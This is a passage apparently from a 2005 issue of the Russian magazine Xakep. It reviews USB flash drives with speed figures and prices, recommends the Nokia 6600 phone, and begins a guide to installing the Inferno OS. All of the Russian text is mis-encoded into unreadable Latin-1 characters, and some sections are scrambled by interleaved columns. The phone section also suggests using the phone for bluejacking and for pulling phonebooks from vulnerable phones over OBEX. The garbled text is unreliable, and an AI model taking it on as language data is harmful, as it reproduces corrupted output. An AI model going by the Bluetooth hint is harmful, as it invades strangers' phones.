Ñòèëüíàÿ ôëåøêà, âåðõíÿÿ ÷àñòü êîòîðîé âûïîëíåíà èç çåðêàëüíîãî ïëàñòèêà. Ýòî áåçóñëîâíî ñìîòðèòñÿ îòëè÷íî, íî òîëüêî äî òåõ ïîð, ïîêà âû íå êîñíåòåñü ýòîé ïîâåðõíîñòè, òàê êàê íà íåé ñðàçó æå îñòàþòñÿ çàìåòíûå îòïå÷àòêè.  îñòàëüíîì õàðàêòåðèñòèêè äåâàéñà íàõîäÿòñÿ íà ñðåäíåì óðîâíå, ïðàâäà, ñêîðîñòíûå ïîêàçàòåëè íåâûñîêè. Ãðàôèê ïîëó÷èëñÿ ðîâíûé, à èìåþùèéñÿ íà íåì îäèí ðåçêèé ïåðåïàä îñîáîãî çíà÷åíèÿ èãðàòü íå áóäåò. Ïîðàäîâàëî íàëè÷èå â êîìïëåêòå ðåìåøêà äëÿ íîøåíèÿ LG Xstick Mirror 2Gb íà øåå.

Ýòîò äåâàéñ ìîæíî óâåðåííî íàçâàòü ñêîðîñòíûì ðåêîðäñìåíîì òåñòà: òàêèõ âûñîêèõ çíà÷åíèé ïîêàçàòåëåé ïåðåäà÷è äàííûõ íåò íè ó îäíîãî èç åãî îïïîíåíòîâ. Íåñìîòðÿ íà ýòî, çàãðóçêà ïðîöåññîðà è âðåìÿ äîñòóïà ê ïàìÿòè íàõîäÿòñÿ íå íà ñàìîì ëó÷øåì óðîâíå (îíè âñå æå âûñîêîâàòû), à íà ãðàôèêå âèäíû áîëüøèå ñêà÷êè, îäèí èç êîòîðûõ íàõîäèòñÿ â ñåðåäèíå äèàïàçîíà. Êîðïóñ èìååò íåáîëüøóþ òîëùèíó è îòëè÷àåòñÿ îò USB-ïîðòà âñåãî íà òðè ìèëëèìåòðà. Êðûøêà ñíàáæåíà ñïåöèàëüíûìè çàùåëêàìè, õîðîøî çàêðåïëÿþùèìè åå. Íà çàäíåé ÷àñòè åñòü îêîøêî äëÿ âåðåâî÷êè, íî åå, ê ñîæàëåíèþ, â êîìïëåêòå íåò.

Sony micro Vault plus

128Mb 512Mb Sony PQI micro Vault Intelligent Stick

256Mb

Âðåìÿ äîñòóïà ê ïàìÿòè, ìñ: 0,902 Çàãðóçêà ïðîöåññîðà, äîëè îò åäèíèöû: 4,4 Èíäåêñ ïåðåäà÷è äàííûõ â íà÷àëå äèàïàçîíà, Êáàéò/ñ: 11800 Èíäåêñ ïåðåäà÷è äàííûõ â êîíöå äèàïàçîíà, Êáàéò/ñ: 11900 Ðàçìåðû, ìì: 58 õ 17 õ 7

Âðåìÿ äîñòóïà ê ïàìÿòè, ìñ: 0,748 Çàãðóçêà ïðîöåññîðà, äîëè îò åäèíèöû: 5,73 Èíäåêñ ïåðåäà÷è äàííûõ â íà÷àëå äèàïàçîíà, Êáàéò/ñ: 5190 Èíäåêñ ïåðåäà÷è äàííûõ â êîíöå äèàïàçîíà, Êáàéò/ñ: 5190 Ðàçìåðû, ìì: 20 x 7 x 61

Âðåìÿ äîñòóïà ê ïàìÿòè, ìñ: 0,699 Çàãðóçêà ïðîöåññîðà, äîëè îò åäèíèöû: 6,2 Èíäåêñ ïåðåäà÷è äàííûõ â íà÷àëå äèàïàçîíà, Êáàéò/ñ: 8120 Èíäåêñ ïåðåäà÷è äàííûõ â êîíöå äèàïàçîíà,Êáàéò: 8070 Ðàçìåðû, ìì: 18 x 2 x 43

$33

$150

$36

Îäíà èç ñàìûõ êîìïàêòíûõ ôëåøåê â îáçîðå, ïðàâäà, ïî òîëùèíå îíà âñå æå íå äîòÿãèâàåò äî ðåêîðäà. Ñêîðîñòè ÷òåíèÿ è çàïèñè âûñîêèå, çàãðóçêà ïðîöåññîðà íåâåëèêà, à âîò âðåìÿ äîñòóïà î÷åíü áîëüøîå. Åñëè íå ñ÷èòàòü äâóõ ðåçêèõ ñêà÷êîâ, òî ïîëó÷åííûé ãðàôèê ìîæíî íàçâàòü ïðàêòè÷åñêè èäåàëüíûì. Íà êðûøêå ïðåäóñìîòðåíî êîëüöî äëÿ ðåìåøêà, íî ïîñëåäíèé â êîìïëåêòå îòñóòñòâóåò, âïðî÷åì, êàê è óäëèíèòåëü USB. Êðûøêà íèêàê íå êðåïèòñÿ ê êîðïóñó è åå ëåãêî ïîòåðÿòü.

Ñðàçó æå îòìåòèì çàìå÷àòåëüíóþ ñïîñîáíîñòü ýòîé ôëåøêè: îíà ñíàáæåíà äåòåêòîðîì îòïå÷àòêîâ ïàëüöåâ, òàê ÷òî åñëè åñòü íåîáõîäèìîñòü ïåðåíîñà êîíôèäåíöèàëüíîé èíôîðìàöèè, òî Sony micro Vault 128 áóäåò î÷åíü êñòàòè, òàê êàê, êðîìå òåáÿ, íè ó êîãî íå áóäåò ê íåé äîñòóïà. Âñå íåîáõîäèìîå ïðîãðàììíîå îáåñïå÷åíèå âõîäèò â êîìïëåêò. Òåì íå ìåíåå èç-çà ýòîãî äåòåêòîðà ðàçìåðû äèñêà ïîëó÷èëèñü âåñüìà çíà÷èòåëüíûìè, à ÷òîáû ýòî íå ìåøàëî ïîäêëþ÷åíèþ, ðàçðàáîò÷èêè ñäåëàëè êîðïóñ, ñóæàþùèéñÿ áëèæå ê USB-ïîðòó. À âîò ðåçóëüòàòû òåñòà îêàçàëèñü íåâûñîêèìè: ðåêîðäíî íèçêàÿ ñêîðîñòü è âûñîêàÿ çàãðóçêà ïðîöåññîðà. Ãðàôèê îñòàëñÿ ðîâíûì.

Ñàìàÿ êîìïàêòíàÿ ôëåøêà â òåñòå, òàê êàê åå òîëùèíà ïðèìåðíî â 2,5 ðàçà ìåíüøå, ÷åì ó ñòàíäàðòíîãî ðàçúåìà USB! Ñ îäíîé ñòîðîíû, ýòî õîðîøî, íî ñ äðóãîé — äëèíà åå âñå æå äîñòàòî÷íî âåëèêà, ÷òîáû åå ìîæíî áûëî ëåãêî ñëîìàòü. Óïàêîâêà èìååò âèä ïëàñòèíû, â êîòîðîé ìîãóò íàõîäèòüñÿ ñðàçó äâà ïîäîáíûõ äåâàéñà. À âîò ñêîðîñòíûå ïîêàçàòåëè íå ïîðàäîâàëè: îíè íàõîäÿòñÿ íà íèçêîì óðîâíå. Òåì íå ìåíåå ãðàôèê ïîëó÷èëñÿ ðîâíûì, ïðàâäà, ïðè òàêîé ñêîðîñòè ÷òåíèÿ/çàïèñè ýòî ñëàáîå óòåøåíèå.

020

XÀÊÅÐ 01 /85/ 05


256MB Imation LG Xstick Flash Drive Mini Aluminum

2GB

LG Xstick Platinum

1GB

Âðåìÿ äîñòóïà ê ïàìÿòè, ìñ: 0,87 Çàãðóçêà ïðîöåññîðà, äîëè îò åäèíèöû: 5,57 Èíäåêñ ïåðåäà÷è äàííûõ â íà÷àëå äèàïàçîíà, Êáàéò/ñ: 12700 Èíäåêñ ïåðåäà÷è äàííûõ â êîíöå äèàïàçîíà, Êáàéò/ñ: 12700 Ðàçìåðû, ìì: 56 õ 17 õ 8

Âðåìÿ äîñòóïà ê ïàìÿòè, ìñ: 0,518 Çàãðóçêà ïðîöåññîðà, äîëè îò åäèíèöû: 4,19 Èíäåêñ ïåðåäà÷è äàííûõ â íà÷àëå äèàïàçîíà, Êáàéò/ñ: 11400 Èíäåêñ ïåðåäà÷è äàííûõ â êîíöå äèàïàçîíà, Êáàéò/ñ: 6720 Ðàçìåðû, ìì: 56 õ 17 õ 8

Âðåìÿ äîñòóïà ê ïàìÿòè, ìñ: 0,802 Çàãðóçêà ïðîöåññîðà, äîëè îò åäèíèöû: 5,4 Èíäåêñ ïåðåäà÷è äàííûõ â íà÷àëå äèàïàçîíà, Êáàéò/ñ: 8070 Èíäåêñ ïåðåäà÷è äàííûõ â êîíöå äèàïàçîíà, Êáàéò: 8000 Ðàçìåðû, ìì: 51 õ 13 õ 5

$23

$139

$87

Imation Flash Drive Mini îòëè÷àåòñÿ îñîáîé êîíñòðóêöèè çàùèòíîé êðûøêè: îíà âûïîëíåíà â âèäå äóæêè, ñïîñîáíîé ïîâîðà÷èâàòüñÿ íà 360 ãðàäóñîâ è òåì ñàìûì ïðèêðûâàòü ðàçúåì. Ê ñîæàëåíèþ, îò ïûëè òàêàÿ êîíñòðóêöèÿ íå çàùèòèò, òàê êàê ïî áîêàì íèêàêèõ ïðåïÿòñòâèé äëÿ íåå íåò. ×òîáû â îòêðûòîì ïîëîæåíèè áûë âèäåí èíäèêàòîð ðàáîòû, íà êðûøêå ñäåëàíî ñïåöèàëüíîå îòâåðñòèå. Ïîìèìî ýòîãî, íà íåé ïðåäóñìîòðåíî êîëüöî äëÿ ðåìåøêà. Ðåçóëüòàòû òåñòèðîâàíèÿ îêàçàëèñü ñêîðåå íà íèçêîì óðîâíå: ñêîðîñòü äîñòóïà ïðèáëèæàåòñÿ ê àíòèðåêîðäó, âðåìÿ äîñòóïà ÷óòü íå äîõîäèò äî ìèëëèñåêóíäû. Ãðàôèê èìååò ÿðêî âûðàæåííóþ ïèëü÷àòóþ ôîðìó è ðÿä íåçíà÷èòåëüíûõ ïåðåïàäîâ.

Ïî âíåøíåìó âèäó ýòîò ôëåø-äèñê íàïîìèíàåò ñâîåãî âûøå îïèñàííîãî ñîáðàòà, íî âåðõíÿÿ ÷àñòü êîðïóñà íå çåðêàëüíàÿ, à ìàòîâàÿ. Âî âñåì îñòàëüíîì îíè áîëåå èëè ìåíåå ñõîæè, ïðàâäà, ó ýòîé çàãðóçêè ïðîöåññîðà ïî÷òè ðåêîðäíî íèçêàÿ ñêîðîñòü. Èç îòðèöàòåëüíûõ ñòîðîí ìîæíî îòìåòèòü íèçêèé ñêîðîñòíîé ïîêàçàòåëü â êîíöå äèàïàçîíà, ÷òî ëåãêî âèäåòü íà ãðàôèêå, êîòîðûé, êñòàòè ãîâîðÿ, íå ñàìûé ëó÷øèé, òàê êàê ÷óòü äàëüøå ñåðåäèíû ñêîðîñòü ðåçêî ïàäàåò è ñîõðàíÿåòñÿ òàêîé äî êîíöà.

Åñëè òû ïîäàðèøü ýòó ôëåøêó ñâîåé äåâóøêå, òî îíà áóäåò â âîñòîðãå: êîìïàêòíàÿ, êîðïóñ ïîëíîñòüþ âûïîëíåí èç áëåñòÿùåãî ìåòàëëà, â êîìïëåêò âõîäèò öåïî÷êà, êîòîðóþ ìîæíî íîñèòü íà øåå, è âñå ýòî óïàêîâàíî â ñòèëüíóþ, ñíàðóæè ñåðåáðèñòóþ, à âíóòðè ïîêðûòóþ áàðõàòíîé òêàíüþ êîðîáî÷êó. Âûãëÿäèò çäîðîâî! Ïðàâäà, ñêîðîñòíûå ïîêàçàòåëè îêàçàëèñü íà íåâûñîêîì óðîâíå: âðåìÿ äîñòóïà âñå æå âåëèêîâàòî, à ñêîðîñòü íà ñðåäíåì óðîâíå ïî òåñòó. Ãðàôèê ÷òåíèÿ/çàïèñè ðîâíûé è íèêàêèõ ïðåòåíçèé ê íåìó íåò.

KINGMAX MaxDrive I

A-Data BCD Smart

1GB Apacer HANDY STENO HT203

512Mb

512Mb

Âðåìÿ äîñòóïà ê ïàìÿòè, ìñ: 0,501 Çàãðóçêà ïðîöåññîðà, äîëè îò åäèíèöû: 6,22 Èíäåêñ ïåðåäà÷è äàííûõ â íà÷àëå äèàïàçîíà, Êáàéò/ñ: 11200 Èíäåêñ ïåðåäà÷è äàííûõ â êîíöå äèàïàçîíà, Êáàéò/ñ: 6660 Ðàçìåðû, ìì: 18 x 8 x 66

Âðåìÿ äîñòóïà ê ïàìÿòè, ìñ: 0,824 Çàãðóçêà ïðîöåññîðà, äîëè îò åäèíèöû: 4,25 Èíäåêñ ïåðåäà÷è äàííûõ â íà÷àëå äèàïàçîíà, Êáàéò/ñ: 12800 Èíäåêñ ïåðåäà÷è äàííûõ â êîíöå äèàïàçîíà, Êáàéò/ñ: 12800 Ðàçìåðû, ìì: 51 x 20 x 8

$32

$38

Âðåìÿ äîñòóïà ê ïàìÿòè, ìñ: 0,748 Çàãðóçêà ïðîöåññîðà, äîëè îò åäèíèöû: 9,56 Èíäåêñ ïåðåäà÷è äàííûõ â íà÷àëå äèàïàçîíà, Êáàéò/ñ: 24900 Èíäåêñ ïåðåäà÷è äàííûõ â êîíöå äèàïàçîíà, Êáàéò/ñ: 25000 Ðàçìåðû, ìì: 21 x 8 x 84

$106 Ó ýòîãî óñòðîéñòâà íåò êðûøêè, çàùèùàþùåé ðàçúåì îò ïûëè, — äëÿ ýòîãî ñàì ðàçúåì çàäâèãàåòñÿ â êîðïóñ. Ê ñîæàëåíèþ, ðû÷àæîê, êîòîðûé íàäî ïðè ýòîì äâèãàòü, ñíàáæåí ëèøü íåáîëüøèìè âûñòóïàìè, êîòîðûå ñëàáî çàùèùàþò îò ïðîñêàëüçûâàíèÿ ïàëüöåâ. Ýòà ôëåøêà îáëàäàåò íå ñàìûì ëó÷øèì ãðàôèêîì ÷òåíèÿ/çàïèñè: âèäíû äâà ïðîäîëæèòåëüíûõ è î÷åíü ðåçêèõ ñêà÷êà ñêîðîñòè, ïðè÷åì ýòè îáëàñòè áîëüøå, ÷åì òå, íà êîòîðûõ ñêîðîñòü âåëèêà. Âñå ýòî âèäíî è â ÷èñëåííûõ çíà÷åíèÿõ. Ïîýòîìó èíäåêñû ïåðåäà÷è äàííûõ â íà÷àëå è êîíöå äèàïàçîíà ñèëüíî ðàçëè÷àþòñÿ.

XÀÊÅÐ 01 /85/ 05

Ñðàçó æå áðîñàåòñÿ â ãëàçà âñòðîåííûé æèäêîêðèñòàëëè÷åñêèé äèñïëåé, íà êîòîðîì â âèäå ñåêòîðíîé äèàãðàììû îòîáðàæàåòñÿ çàïîëíåíèå ôëåøêè (÷åì áîëüøå ìåñòà çàíÿòî, òåì áîëüøå ñåêòîð êðóãà çàêðàøåí) è íàçâàíèå äèñêà. Íà÷àëüíîå è êîíå÷íîå çíà÷åíèå èíäåêñà ïåðåäà÷è äàííûõ íàõîäÿòñÿ ñêîðåå íà âûñîêîì óðîâíå, â òî âðåìÿ êàê çàãðóçêà ïðîöåññîðà ìîãëà áû áûòü è ïîìåíüøå. Âðåìÿ äîñòóïà ê ïàìÿòè îñîáî íå îòëè÷àåòñÿ îò êîíêóðåíòîâ. Ãðàôèê ÷òåíèÿ/çàïèñè ðîâíûé, íî çàìåòíûå ñêà÷êè âñå æå èìåþò ìåñòî. Èç íåäîñòàòêîâ ìîæíî îòìåòèòü áîëüøèå ðàçìåðû íîñèòåëÿ. Êðûøêà, çàêðûâàþùàÿ ðàçúåì, íèêàê íå êðåïèòñÿ ê êîðïóñó.

Ýòó ôëåøêó ìîæíî ïî ïðàâó íàçâàòü ñàìîé ëó÷øåé â îáçîðå ïî âñåì ïîêàçàòåëÿì, è ñàìûé ãëàâíûé èç íèõ — ñêîðîñòü: îíà â äâà ðàçà âûøå, ÷åì ó ëþáîé îïèñàííîé âûøå! Íà ýòîì ôîíå íåáîëüøèå îòêëîíåíèÿ íà ãðàôèêå ÷òåíèÿ/çàïèñè áóäóò íè÷òîæíî ìàëûìè, òàê ÷òî çàïîëíèòü ïàìÿòü ïîëíîñòüþ ìîæíî î÷åíü áûñòðî. Õîðîøàÿ ýðãîíîìèêà: òîëùèíà äåâàéñà íåáîëüøàÿ, à êðûøêà êðåïèòñÿ ê êîðïóñó ñòèëüíûì ìåòàëëè÷åñêèì òðîñèêîì, è ïîòåðÿòü åå ïðàêòè÷åñêè íåðåàëüíî. Äà è äèçàéí Apacer HANDYSTENO HT203 ñðàçó âûäåëÿåò åå èç îáùåé ìàññû.

021


ÕÀÊÅÐ ÐÅÊÎÌÅÍÄÓÅÒ ///// ISSUE

NOKIA 6600 $260

ÌÍÎÃÎ ÑÎÔÒÀ

ÕÎÐÎØÈÉ ÝÊÐÀÍ

VGA-Ê ÊÀÌÅÐÀ

ÓÄÎÁÍÀß ØÒÓÊÀ

ÎÕÎÒÀ ÍÀ BLUETOOTH

Ñìàðòôîí ðàáîòàåò ïîä Symbian øåñòîé âåðñèè è äëÿ íåãî íàïèñàëè î÷åíü ìíîãî ñàìîãî ðàçíîîáðàçíîãî ñîôòà. Íà 6600 áåç ïðîáëåì ìîæíî ïîñòàâèòü äàæå ïîðò Putty è ïî SSH çàïóñêàòü è êîíòðîëèðîâàòü ñâîè ãðàçíûå ïðîöåññû íà óäàëåííîì øåëëå. Ìîæíî ýëåìåíòàðíî óñòàíîâèòü Opera è ñåðôèòü èíåò; ìîæíî ïîñòàâèòü UltraMP3, ïîäêëþ÷èòü óøè, è ñëóøàòü ìóçûêó.

Ó 6600 õîðîøèé, áîëüøîé è ÿðêèé ýêðàí. Ýêðàíà âïîëíå õâàòàåò, ÷òîáû ñåðôèòü îáûêíîâåííûå html-ñàéòû ïðè ïîìîùè Opera. Íàïðèìåð, ñòðàíèöà ñ ðåçóëüòàòàìè ïîèñêà ßíäåêñà îòîáðàæàåòñÿ çàìå÷àòåëüíî. Ãîðëóì âîîáùå íå îáëàìûâàåòñÿ: ÷èòàåò â ìåòðî êíèæêè ïðÿìî ñ ýêðàíà. Íà 6600 ìîæíî çàïðîñòî ñìîòðåòü âèäÿøêè, ïîêàçûâàòü äðóçüÿì ôîòêè.

Ó ìîáèëüíèêà õîðîøàÿ êàìåðà, êîòîðîé ìîæíî äåëàòü íîðìàëüíûå ôîòêè. Ýòî òî÷íî íå òîò ñëó÷àé, êîãäà êàìåðà íóæíà òîëüêî êàê ïîíòîâûé ãëàçèê, êîòîðûé äîáàâëÿåò 40 áàêñîâ ê öåíå è áîëüøå íå èñïîëüçóåòñÿ. Åñëè òû îòïðàâèøüñÿ âåñåëèòüñÿ ñ äðóçüÿìè è ïîä ðóêîé íå îêàæåòñÿ íîðìàëüíîãî öèôðîâèêà, âû âñå ðàâíî íå îáëîìàåòåñü: 6600 âûðó÷èò.

Ýòî î÷åíü óäîáíûé òåëåôîí. Õîðîøî ëåæèò â ðóêå, çàìåòíî ìåíüøå áîëüøèíñòâà äðóãèõ ñìàðòôîíîâ. Êîðïóñ ëåãêî ïîìåíÿòü íà ëþáîé äðóãîé: 600 ðóáëåé è òâîé òåëåôîí íå ïîõîæ íà âñå îñòàëüíûå. Êàðòû ïÿìÿòè MMC ñåé÷àñ ñòîÿò íåäîðîãî, ìîæíî â òåëåôîí ïîñòàâèòü õîòü 512 Ìá è íå ïàðèòüñÿ íàä ñâîáîäíûì ìåñòîì. Åäèíñòâåííîå íåñèëüíîå ìåñòî – ñòàíäàðòíàÿ áàòàðåéêà. Íî íà 3 äíÿ õâàòàåò, åñëè íå èãðàòü 24h.

Ñòîèò òîëüêî ïîñòàâèòü íà ýòîò ñìàðòôîí ñîôòèíó âðîäå BTExplorer, êàê îí ñðàçó ïðèâðàòèòüñÿ â ñåðüåçíîå îðóæèå áëþäæåêåðà :). Òû ñìîæåøü ñêàíèðîâàòü îêðåñòíîñòè, ïîëó÷àÿ èìåíà è BT-àäðåñà ñîñåäíèõ óñòðîéñòâ, îòñûëàòü èì ñîîáùåíèÿ, êàðòèíêè è vcards â ëþáûõ êîëè÷åñòâàõ è äàæå ïðîñìàòðèâàòü ñïèñîê ñåðâèñîâ óñòðîéñòâà. Äóìàþ, ìîæíî çàïðîñòî íàó÷èòü6600 è âûòàñêèâàòü ÷åðåç OBEX òåëåôîííûå êíèæêè ñ äûðÿâûõ òåëåôîíîâ.

022

XÀÊÅÐ 01 /85/ 06


PC_ZONE

TEXT A.M.D.F. / HTTP://AMDF.PP.RU /

ÌÀÃÈ×ÅÑÊÈÉ ÑÂÈÒÎÊ INFERNO — ÍÎÂÎÅ ÏÎÊÎËÅÍÈÅ UNIX ÓÆÅ ÑÅÉ×ÀÑ!

ÁÎËÜØÈÍÑÒÂÎ ÑÎÂÐÅÌÅÍÍÛÕ UNIX-ÑÈÑÒÅÌ ÐÀÇÐÀÁÀÒÛÂÀÞÒÑß ÄÎÑÒÀÒÎ×ÍÎ ÄÀÂÍÎ, È ÎÑÍÎÂÀÍÛ ÍÀ ÅÙÅ ÁÎËÅÅ ÑÒÀÐÛÕ ÎÏÅÐÀÖÈÎÍÍÛÕ ÑÈÑÒÅÌÀÕ. ÈÕ ÓÑÒÐÎÉÑÒÂÎ È ËÎÃÈÊÀ ÐÀÁÎÒÛ ÏÐÎÄÎËÆÀÅÒ ÎÑÍÎÂÛÂÀÒÜÑß ÍÀ ÏÐÈÍÖÈÏÀÕ, ÇÀËÎÆÅÍÍÛÕ ÅÙÅ Â 60-Å ÃÎÄÛ ÏÐÎØËÎÃÎ ÂÅÊÀ, È ÎÍÈ ÏÐÎÄÎËÆÀÞÒ ÐÀÇÂÈÂÀÒÜÑß, ÍÅ ÂÍÎÑß ÊÀÊÈÕ-ËÈÁÎ ÑÓÙÅÑÒÂÅÍÍÛÕ ÈÇÌÅÍÅÍÈÉ Â ÏÐÈÍÖÈÏÛ ÑÂÎÅÉ ÐÀÁÎÒÛ. ÑÓÙÅÑÒÂÓÅÒ ÎÏÅÐÀÖÈÎÍÍÀß ÑÈÑÒÅÌÀ, ÏÐÅÄÑÒÀÂÈÒÅËÜÍÈÖÀ ÍÎÂÎÃÎ ÏÎÊÎËÅÍÈß UNIX, ÏÎÑÒÐÎÅÍÍÀß Ñ ÈÑÏÎËÜÇÎÂÀÍÈÅÌ ÑÂÅÆÈÕ ÈÄÅÉ. ÅÅ ÈÌß — INFERNO

ÍÎÂÛÉ ÊÎÌÏÀÊÒÍÛÉ UNIX

ÏÐÈÍÖÈÏÛ ÐÀÁÎÒÛ

ÌÓËÜÒÈÏËÀÒÔÎÐÌÅÍÍÎÑÒÜ

Inferno — ýòî êîìïàêòíàÿ îïåðàöèîííàÿ ñèñòåìà, ñîçäàííàÿ äëÿ ðàçðàáîòêè êðîññïëàòôîðìåííûõ ðàñïðåäåëåííûõ ñèñòåì íà áîëüøîì êîëè÷åñòâå óñòðîéñòâ è ïëàòôîðì. Ðàçðàáîò÷èê îïåðàöèîííîé ñèñòåìû — êîìïàíèÿ Vita Nuova. Ïðèíöèïû óñòðîéñòâà Inferno áàçèðóþòñÿ íà ðàçðàáîòêàõ ëàáîðàòîðèè Bell Labs. Inferno ðàñïðîñòðàíÿ-

 îñíîâå ôóíêöèîíèðîâàíèÿ Inferno ëåæàò òðè ïðîñòûõ ïðèíöèïà. Ïåðâûé ïðèíöèï çàêëþ÷àåòñÿ â òîì, ÷òî âñå ðåñóðñû, ñ êîòîðûìè èìååò äåëî Inferno, ïðåäñòàâëåíû â âèäå ôàéëîâ, è äëÿ ïîëó÷åíèÿ äîñòóïà ê íèì íåîáõîäèìî èñïîëüçîâàòü åäèíîå äëÿ âñåõ âèäîâ ðåñóðñîâ ôàéëîâîå API. Ñ òî÷êè çðåíèÿ ïðîãðàììèðîâàíèÿ, ìîæíî ñîâåðøåííî îäèíàêîâî ðàáîòàòü ñ ïðîöåññàìè, ñåðâèñàìè, ñåòåâûìè ðåñóðñàìè è ïîäêëþ÷åíèÿìè, à òàêæå ñ óñòðîéñòâàìè õðàíåíèÿ. Íà ïîõîæèõ ïðèíöèïàõ ñòðîÿòñÿ âñå Unix-ñèñòåìû.  ýòîì çàêëþ÷àåòñÿ èõ ñóùåñòâåííîå îòëè÷èå îò òàêèõ îïåðàöèîííûõ ñèñ-

åòñÿ ïî äîâîëüíî ñëîæíîé ñèñòåìå ëèöåíçèðîâàíèÿ: âñåãî äëÿ ðàçíûõ êîìïîíåíòîâ èñïîëüçóåòñÿ ÷åòûðå ðàçíûõ ëèöåíçèè. Íàïðèìåð, ÿäðî ñèñòåìû ðàñïðîñòðàíÿåòñÿ ïî ëèöåíçèè Vita Nuova free-for-all, áèáëèîòåêè âèðòóàëüíîé ìàøèíû è êîìïèëÿòîðà Limbo — ïî LGPL, à áîëüøèíñòâî ïðèëîæåíèé è ñàì êîìïèëÿòîð — ïî GPL.

òåì, êàê Windows, â êîòîðûõ äëÿ ôàéëîâ èìååòñÿ ñâîå API, äëÿ ðååñòðà — äðóãîå, äëÿ ïðîöåññîâ — òðåòüå è ò.ä. Ôàéëû îáúåäèíåíû â èåðàðõè÷åñêóþ ôàéëîâóþ ñèñòåìó, è èç ýòîãî âûòåêàåò âòîðîé ïðèíöèï Inferno: ëîêàëüíûå è óäàëåííûå ýëåìåíòû ôàéëîâîé ñèñòåìû ìîãóò ñîñåäñòâîâàòü äðóã ñ äðóãîì, à èõ îáðàáîòêà íè÷åì íå îòëè÷àåòñÿ (ñ òî÷êè çðåíèÿ ïðèêëàäíîé ïðîãðàììû). Èç-çà òîãî, ÷òî íå ïðèõîäèòñÿ âûáèðàòü ìåòîä äîñòóïà ê ôàéëó, çíà÷èòåëüíî îáëåã÷àåòñÿ ïðîãðàììèðîâàíèå ñåòåâûõ ðàñïðåäåëåííûõ ïðèëîæåíèé. Òðåòèé ïðèíöèï — ýòî ñòàíäàðòíûé êîììóíèêàöèîííûé ïðîòîêîë. Inferno

èìååò ñïåöèàëüíûé ïðîòîêîë Styx, ñëóæàùèé äëÿ äîñòóïà êî âñåì ðåñóðñàì, ñ êîòîðûìè ðàáîòàåò ïðîãðàììà, íåçàâèñèìî îò òîãî, ÿâëÿþòñÿ ëè îíè ëîêàëüíûìè èëè óäàëåííûìè. Íàëè÷èå îäíîãî ïðîòîêîëà ïîçâîëÿåò óâåëè÷èòü áåçîïàñíîñòü ñèñòåìû, òàê êàê Styx ïîääåðæèâàåò àóòåíòèôèêàöèþ íà îñíîâå ñåðòèôèêàòîâ è øèôðîâàíèå òðàôèêà. Styx ÿâëÿåòñÿ ÷àñòüþ îïåðàöèîííîé ñèñòåìû, ïîýòîìó ïðèëîæåíèÿì íå òðåáóåòñÿ ÿâíî åãî èñïîëüçîâàòü, âñå ïðîèñõîäèò íà áîëåå ãëóáîêîì óðîâíå. Styx ðàáîòàåò ïîâåðõ ðàçíûõ òðàíñïîðòíûõ ïðîòîêîëîâ, òàêèõ êàê TCP/IP, ATM è PPP.

Ñóùåñòâóåò äâà âàðèàíòà óñòàíîâêè Inferno. Ïåðâûé âàðèàíò — îáû÷íàÿ óñòàíîâêà íà æåñòêèé äèñê êîìïüþòåðà. Âòîðîé âàðèàíò — óñòàíîâêà îïåðàöèîííîé ñèñòåìû. Äëÿ ýòîãî íå ïîíàäîáèòñÿ èñïîëüçîâàòü PC-ýìóëÿòîðû âðîäå vmware, ïîòîìó ÷òî ñðåäñòâà äëÿ çàïóñêà ïîä äðóãîé îïåðàöèîííîé ñèñòåìîé óæå âñòðîåíû â Inferno. ß ðàññìîòðþ çäåñü òîëüêî âòîðîé âàðèàíò, òàê êàê îí îïòèìàëåí äëÿ îçíàêîìëåíèÿ ñ íîâîé ÎÑ. Inferno ìîæåò çàïóñêàòüñÿ ïðàêòè÷åñêè ïîä âñåìè ðàñïðîñòðàíåííûìè íà ñåãîäíÿøíèé äåíü ïëàòôîðìàìè: êîíå÷íî æå, ïîä Windows, à òàêæå ïîä Linux, FreeBSD è äðóãèìè Unix-ñîâìåñòèìûìè ñèñòåìàìè (Irix, Solaris è äàæå MacOS X). ×òî êàñàåòñÿ Windows, òî ïðèãîäíûìè äëÿ çàïóñêà Inferno áóäóò òîëüêî ñèñòåìû, ïîñòðîåííûå íà áàçå ÿäðà NT: Windows 2k, XP è 2003. Ïëàòôîðìà Win9x íå ïîääåðæèâàåòñÿ.

À, ÒÍÀß ÎÏÅÐÀÖÈÎÍÍÀß ÑÈÑÒÅÌ INFERNO — ÝÒÎ ÊÎÌÏÀÊÒ ËÅÍÍÛÕ ÑÈÑÒÅÌ ÄÅË ÒÔÎÐÌÅÍÍÛÕ ÐÀÑÏÐÅÄ ËÀÒ ÏË ÑÑ ÐÎ Ê ÊÈ Ò ÁÎ ÐÀ ÀÇ Ð ß Ë Ä ß ÄÀÍÍÀ ÑÎÇÄ 024

XÀÊÅÐ 01 /85/ 06


XÀÊÅÐ 01 /85/ 06

025


PC_ZONE ///// ISSUE

ÌÓËÜÒÈÏËÀÒÔÎÐÌÅÍÍÎÑÒÜ

ÓÑÒÀÍÎÂÊÀ ÍÀ UNIX

Àïïàðàòíûå ïëàòôîðìû òîæå ïðåäñòàâëåíû â ñïèñêå ñîâìåñòèìîñòè â áîëüøîì àññîðòèìåíòå: x86, Sparc, MIPS, ARM, HP-PA, PowerPC è äðóãèå. Äëÿ íà÷àëà ïîíàäîáèòñÿ ñêà÷àòü ñ ñàéòà îïåðàöèîííîé ñèñòåìû íåîáõîäèìûå äèñòðèáóòèâû. Ñòðàíèöà äëÿ çàãðóçêè ÷åòâåðòîé ðåäàêöèè äèñòðèáóòèâà Inferno íàõîäèòñÿ ïî àäðåñó www.vitanuova.com/inferno/net_download4T.html. Ìîæíî ñêà÷àòü îáðàç óñòàíîâî÷íîãî CD, íà êîòîðîì áóäóò ôàéëû, íåîáõîäèìûå äëÿ óñòàíîâêè íà ëþáóþ èç âûøåïåðå÷èñëåííûõ ïëàòôîðì. Åñëè æå òû òî÷íî çíàåøü, íà êàêóþ èìåííî ïëàòôîðìó òû áóäåøü óñòàíàâëèâàòü Inferno, à òàêæå åñëè òû õî÷åøü ñýêîíîìèòü íà âðåìåíè è òðàôèêå (âåäü îáðàç óñòàíîâî÷íîãî CD âåñèò ïî÷òè 60 Ìá, è åãî ñêà÷èâàíèå ïî ìîäåìó ìîæåò çàòÿíóòüñÿ), òî ìîæíî íå ñêà÷èâàòü âñå öåëèêîì, à çàãðóçèòü òîëüêî àðõèâ inferno.tgz, â êîòîðîì íàõîäèòñÿ íåïîñðåäñòâåííî ñàìà îïåðàöèîííàÿ ñèñòåìà è äîïîëíèòåëüíî åùå îäèí àðõèâ, â êîòîðîì áóäóò íàõîäèòüñÿ êîìïîíåíòû, íåîáõîäèìûå äëÿ çàïóñêà íà òîé èëè èíîé ïëàòôîðìå. Ýòè äâà àðõèâà 